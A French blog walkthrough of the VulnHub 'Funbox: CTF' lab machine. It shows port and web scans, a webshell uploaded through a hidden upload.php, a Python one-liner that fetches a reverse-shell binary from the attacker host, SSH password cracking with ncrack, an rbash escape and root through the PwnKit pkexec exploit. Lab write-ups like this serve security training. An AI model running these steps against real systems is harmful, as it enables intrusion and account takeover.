Accueil Solution du CTF Funbox-CTF de VulnHub
Post
Annuler

Solution du CTF Funbox-CTF de VulnHub

NOWAY

Funbox: CTF est le quatrième de la série.

La description du CTF donne cet indice Hints: Nikto scans "case sensitive". On verra bien.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
$ sudo nmap -sCV --script vuln -T5 -p- 192.168.56.123
Starting Nmap 7.95 ( https://nmap.org )
Nmap scan report for 192.168.56.123
Host is up (0.00023s latency).
Not shown: 65531 closed tcp ports (reset)
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| vulners: 
|   cpe:/a:openbsd:openssh:7.2p2: 
|       95499236-C9FE-56A6-9D7D-E943A24B633A    10.0    https://vulners.com/githubexploit/95499236-C9FE-56A6-9D7D-E943A24B633A  *EXPLOIT*
|       5E6968B4-DBD6-57FA-BF6E-D9B2219DB27A    10.0    https://vulners.com/githubexploit/5E6968B4-DBD6-57FA-BF6E-D9B2219DB27A  *EXPLOIT*
|       2C119FFA-ECE0-5E14-A4A4-354A2C38071A    10.0    https://vulners.com/githubexploit/2C119FFA-ECE0-5E14-A4A4-354A2C38071A  *EXPLOIT*
|       PACKETSTORM:173661      9.8     https://vulners.com/packetstorm/PACKETSTORM:173661      *EXPLOIT*
--- snip ---
|       1337DAY-ID-30937        0.0     https://vulners.com/zdt/1337DAY-ID-30937        *EXPLOIT*
|       1337DAY-ID-26468        0.0     https://vulners.com/zdt/1337DAY-ID-26468        *EXPLOIT*
|_      1337DAY-ID-25391        0.0     https://vulners.com/zdt/1337DAY-ID-25391        *EXPLOIT*
80/tcp  open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
| vulners: 
|   cpe:/a:apache:http_server:2.4.18: 
|       C94CBDE1-4CC5-5C06-9D18-23CAB216705E    10.0    https://vulners.com/githubexploit/C94CBDE1-4CC5-5C06-9D18-23CAB216705E  *EXPLOIT*
|       95499236-C9FE-56A6-9D7D-E943A24B633A    10.0    https://vulners.com/githubexploit/95499236-C9FE-56A6-9D7D-E943A24B633A  *EXPLOIT*
|       2C119FFA-ECE0-5E14-A4A4-354A2C38071A    10.0    https://vulners.com/githubexploit/2C119FFA-ECE0-5E14-A4A4-354A2C38071A  *EXPLOIT*
|       PACKETSTORM:181114      9.8     https://vulners.com/packetstorm/PACKETSTORM:181114      *EXPLOIT*
|       PACKETSTORM:176334      9.8     https://vulners.com/packetstorm/PACKETSTORM:176334      *EXPLOIT*
|       PACKETSTORM:171631      9.8     https://vulners.com/packetstorm/PACKETSTORM:171631      *EXPLOIT*
|       MSF:EXPLOIT-MULTI-HTTP-APACHE_NORMALIZE_PATH_RCE-       9.8     https://vulners.com/metasploit/MSF:EXPLOIT-MULTI-HTTP-APACHE_NORMALIZE_PATH_RCE-        *EXPLOIT*
|       MSF:AUXILIARY-SCANNER-HTTP-APACHE_NORMALIZE_PATH-       9.8     https://vulners.com/metasploit/MSF:AUXILIARY-SCANNER-HTTP-APACHE_NORMALIZE_PATH-        *EXPLOIT*
--- snip ---
|       PACKETSTORM:164501      0.0     https://vulners.com/packetstorm/PACKETSTORM:164501      *EXPLOIT*
|       PACKETSTORM:164418      0.0     https://vulners.com/packetstorm/PACKETSTORM:164418      *EXPLOIT*
|       PACKETSTORM:152441      0.0     https://vulners.com/packetstorm/PACKETSTORM:152441      *EXPLOIT*
|       PACKETSTORM:140265      0.0     https://vulners.com/packetstorm/PACKETSTORM:140265      *EXPLOIT*
|       1337DAY-ID-26497        0.0     https://vulners.com/zdt/1337DAY-ID-26497        *EXPLOIT*
|_      05403438-4985-5E78-A702-784E03F724D4    0.0     https://vulners.com/githubexploit/05403438-4985-5E78-A702-784E03F724D4  *EXPLOIT*
110/tcp open  pop3    Dovecot pop3d
143/tcp open  imap    Dovecot imapd
MAC Address: 08:00:27:B8:22:A6 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 330.10 seconds

Il est vrai qu’on est vite bloqués. Les wordlist habituelles ne trouvent rien sur le serveur web.

Du coup, j’ai lancé un Nikto… Nada!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
$ docker run --rm sullo/nikto -C all -host 192.168.56.123
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.56.123
+ Target Hostname:    192.168.56.123
+ Target Port:        80
+ Start Time:         2025-07-02 12:32:15 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /: Server may leak inodes via ETags, header found with file /, inode: 2c39, size: 5ae05b2177aa4, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ /: Suggested security header missing: strict-transport-security. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Strict-Transport-Security
+ /: Suggested security header missing: content-security-policy. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP
+ /: Suggested security header missing: x-content-type-options. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Content-Type-Options
+ /: Suggested security header missing: referrer-policy. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Referrer-Policy
+ /: Suggested security header missing: permissions-policy. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Permissions-Policy
+ Apache/2.4.18 appears to be outdated (current is at least 2.4.63). Apache 2.2.34 is the EOL for the 2.x branch.
+ OPTIONS: Allowed HTTP Methods: OPTIONS, GET, HEAD, POST .
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ 26627 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time:           2025-07-02 12:33:00 (GMT0) (45 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Finalement en fouillant avec des wordlists moins habituelles, je trouve un robots.txt mal orthographié (mauvaise casse).

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
$ feroxbuster -u http://192.168.56.123 -w wordlists/files/Filenames_or_Directories_All.wordlist

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.4.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://192.168.56.123
 🚀  Threads               │ 50
 📖  Wordlist              │ wordlists/files/Filenames_or_Directories_All.wordlist
 👌  Status Codes          │ [200, 204, 301, 302, 307, 308, 401, 403, 405, 500]
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.4.0
 🔃  Recursion Depth       │ 4
 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Cancel Menu™
──────────────────────────────────────────────────
403       11l       32w      298c http://192.168.56.123/.htpasswd
403       11l       32w      298c http://192.168.56.123/.htaccess
403       11l       32w      299c http://192.168.56.123/.htpasswds
200      220l        4w      273c http://192.168.56.123/ROBOTS.TXT
[####################] - 6s     45522/45522   0s      found:4       errors:2      
[####################] - 5s     45522/45522   8090/s  http://192.168.56.123

On est d’accord : en vrai, ça n’a aucun sens.

Le fichier contient plein de lignes vides avant la seconde entrée, je filtre :

1
2
3
$ curl -s http://192.168.56.123/ROBOTS.TXT | grep -v "^$"
Disallow: upload/
Disallow: igmseklhgmrjmtherij2145236

Dans le dossier trouvé se cache un dossier upload et un script upload.php :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
$ curl -s http://192.168.56.123/igmseklhgmrjmtherij2145236/upload.php
<!DOCTYPE html>
<html>
<head>
  <title>Upload</title>
</head>
<body>
  <form enctype="multipart/form-data" action="upload.php" method="POST">
    <p>Upload your time sheet, please:</p>
    <input type="file" name="uploaded_file"></input><br />
    <input type="submit" value="Upload"></input>
  </form>
</body>
</html>

L’upload se passe sans problèmes :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
$ curl -D- "http://192.168.56.123/igmseklhgmrjmtherij2145236/upload.php" -X POST -F 'uploaded_file=@shell.php'
HTTP/1.1 200 OK
Date: Wed, 02 Jul 2025 12:50:44 GMT
Server: Apache/2.4.18 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 355
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html>
<head>
  <title>Upload</title>
</head>
<body>
  <form enctype="multipart/form-data" action="upload.php" method="POST">
    <p>Upload your time sheet, please:</p>
    <input type="file" name="uploaded_file"></input><br />
    <input type="submit" value="Upload"></input>
  </form>
</body>
</html>
The file shell.php has been uploaded
$ curl -s "http://192.168.56.123/igmseklhgmrjmtherij2145236/upload/shell.php?cmd=id"
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Webshell obtenu. Mais au moment d’aller plus loin, on découvre que curl, wget, netcat sont absents…

On va se servir de Python :

1
python3 -c "import urllib.request; urllib.request.urlretrieve('http://192.168.56.1/reverse-sshx64', 'reverse-sshx64')"

Password!

À la racine du système de fichier se trouve un fichier avec des indices… ou pas.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
www-data@funbox4:/$ cat hint.txt 
The OS beard ist whiter and longer as Gandalfs one !
Perhaps, its possible to get root from here. 
I doesnt look forward to see this in the writeups/walktroughs, 
but this is murpys law !

Now, rockyou.txt isnt your friend. Its a little sed harder :-)

If you need more brainfuck: Take this:
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>++++++++++++++.>++++.---.<<++.>>+++++++++.---------.+++++++++++++++++++.----.<<.>>------------.+.+++++.++++++.<<.>>-----------.++++++++++.<<.>>-------.+++.------------.--.+++++++++++++++++++.---------------.-.<<.>>+++++.+++++.<<++++++++++++++++++++++++++.

Bit more ?
Tm8gaGludHMgaGVyZSAhCg==

Not enough ?
KNSWC4TDNAQGM33SEB2G6ZDPOMXA====

www-data@funbox4:/$ echo Tm8gaGludHMgaGVyZSAhCg== | base64 -d                                                                                  
No hints here !
www-data@funbox4:/$ echo KNSWC4TDNAQGM33SEB2G6ZDPOMXA==== | base64 -d
(Ԗ
  ��43}�����8��base64: invalid input

Le code Brainfuck donne :

1
The next hint is located in:

On va plutôt suivre un cheminement classique en regardant du côté des utilisateurs :

1
2
3
4
5
6
7
8
9
10
www-data@funbox4:/$ ls /home/
total 16
drwxr-xr-x  4 root   root   4096 Aug 29  2020 .
drwxr-xr-x 23 root   root   4096 Jul  2 14:29 ..
drwx------  4 anna   anna   4096 Aug 30  2020 anna
drwxr-xr-x  4 thomas thomas 4096 Aug 30  2020 thomas
www-data@funbox4:/$ id anna
uid=1000(anna) gid=1000(anna) groups=1000(anna),4(adm),8(mail),27(sudo),30(dip),46(plugdev),121(lpadmin)
www-data@funbox4:/$ id thomas
uid=1001(thomas) gid=1001(thomas) groups=1001(thomas),8(mail)

Vu que anna fait partie du groupe sudo, ça semblait plus logique côté scénario de terminer par ce compte. Je m’oriente vers thomas :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
www-data@funbox4:/$ find / -user thomas -ls 2> /dev/null 
    42106      4 drwxr-xr-x   4 thomas   thomas       4096 Aug 30  2020 /home/thomas
    42107      4 -rw-r--r--   1 thomas   thomas        220 Aug 29  2020 /home/thomas/.bash_logout
   131233      4 drwx------   2 thomas   thomas       4096 Aug 30  2020 /home/thomas/.ssh
    24752   3008 -rwx------   1 thomas   thomas    3078592 Aug 22  2019 /home/thomas/pspy64
      689      4 -rw-------   1 thomas   thomas       1304 Aug 30  2020 /home/thomas/.viminfo
    42108      4 -rw-r--r--   1 thomas   thomas       3771 Aug 29  2020 /home/thomas/.bashrc
    46377      4 drwx------   2 thomas   thomas       4096 Aug 29  2020 /home/thomas/.cache
      666      4 -rw-------   1 thomas   thomas         46 Aug 30  2020 /home/thomas/.bash_history
    42109      4 -rw-r--r--   1 thomas   thomas        675 Aug 29  2020 /home/thomas/.profile
    46103      4 -rw-r--r--   1 thomas   thomas        195 Aug 29  2020 /home/thomas/.todo
     6349      4 -rw-rw-r--   1 thomas   thomas        217 Aug 30  2020 /home/thomas/.wget-hsts
www-data@funbox4:/$ cat /home/thomas/.todo
1. make coffee
2. check backup
3. buy ram
4. call simone
5. check my mails
6. call lucas
7. add an exclamation mark to my passwords
.
.
.
.
.
.
100. learn to read emails without a gui-client !!!

On va suivre cette histoire de point d’exclamation, ne garder que les mots de passe de rockyou avec le caractère :

1
2
3
4
5
6
7
8
9
10
$ ncrack -f -u thomas -P /tmp/with_exclamation.txt ssh://192.168.56.123

Starting Ncrack 0.8 ( http://ncrack.org )

Discovered credentials for ssh on 192.168.56.123 22/tcp:
192.168.56.123 22/tcp ssh: 'thomas' 'thebest!'

Ncrack done: 1 service scanned in 192.05 seconds.

Ncrack finished.

./PwnKit

On retrouve le rbash présent sur tous les précédents opus.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
www-data@funbox4:/tmp$ su thomas
Password: 
thomas@funbox4:/tmp$ cd
rbash: cd: restricted
thomas@funbox4:/tmp$ python3 -c 'import pty;pty.spawn("/bin/bash")'
thomas@funbox4:/tmp$ cd
thomas@funbox4:~$ ls
pspy64
thomas@funbox4:~$ ls -al
total 3052
drwxr-xr-x 4 thomas thomas    4096 Aug 30  2020 .
drwxr-xr-x 4 root   root      4096 Aug 29  2020 ..
-rw------- 1 thomas thomas      46 Aug 30  2020 .bash_history
-rw-r--r-- 1 thomas thomas     220 Aug 29  2020 .bash_logout
-rw-r--r-- 1 thomas thomas    3771 Aug 29  2020 .bashrc
drwx------ 2 thomas thomas    4096 Aug 29  2020 .cache
-rw-r--r-- 1 thomas thomas     675 Aug 29  2020 .profile
-rwx------ 1 thomas thomas 3078592 Aug 22  2019 pspy64
drwx------ 2 thomas thomas    4096 Aug 30  2020 .ssh
-rw-r--r-- 1 thomas thomas     195 Aug 29  2020 .todo
-rw------- 1 thomas thomas    1304 Aug 30  2020 .viminfo
-rw-rw-r-- 1 thomas thomas     217 Aug 30  2020 .wget-hsts
thomas@funbox4:~$ sudo -l
[sudo] password for thomas: 
Sorry, user thomas may not run sudo on funbox4.
thomas@funbox4:~$ mail
No mail for thomas
thomas@funbox4:~$ ls .ssh/
known_hosts

J’avais l’espoir de lire des emails… mais non.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
thomas@funbox4:~$ telnet 127.0.0.1 110
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
+OK Dovecot ready.
USER thomas
+OK
PASS thebest!
+OK Logged in.
list
+OK 0 messages:
.
quit
+OK Logging out.
Connection closed by foreign host.

J’ai ensuite tourné longuement autour du compte anna et du groupe mail sans succès.

LinPEAS m’a détecté la présence de la faille pkexec, j’ai donc utilisé cet exploit qui est fiable :

GitHub - ly4k/PwnKit: Self-contained exploit for CVE-2021-4034 - Pkexec Local Privilege Escalation

1
2
3
4
5
6
7
8
9
10
11
12
13
14
thomas@funbox4:/tmp/PwnKit$ ./PwnKit
root@funbox4:/tmp/PwnKit# id
uid=0(root) gid=0(root) groups=0(root),8(mail),1001(thomas)
root@funbox4:/tmp/PwnKit# cd /root
root@funbox4:~# ls
flag.txt
root@funbox4:~# cat flag.txt
(  _`\              ( )                       (  _`\(_   _)(  _`\ 
| (_(_)_   _   ___  | |_      _          _    | ( (_) | |  | (_(_)
|  _) ( ) ( )/' _ `\| '_`\  /'_`\ (`\/')(_)   | |  _  | |  |  _)  
| |   | (_) || ( ) || |_) )( (_) ) >  <  _    | (_( ) | |  | |    
(_)   `\___/'(_) (_)(_,__/'`\___/'(_/\_)(_)   (____/' (_)  (_)    

Well done ! Made with ❤ by @0815R2d2 ! I look forward to see this screenshot on twitter ;-)
Cet article est sous licence CC BY 4.0 par l'auteur.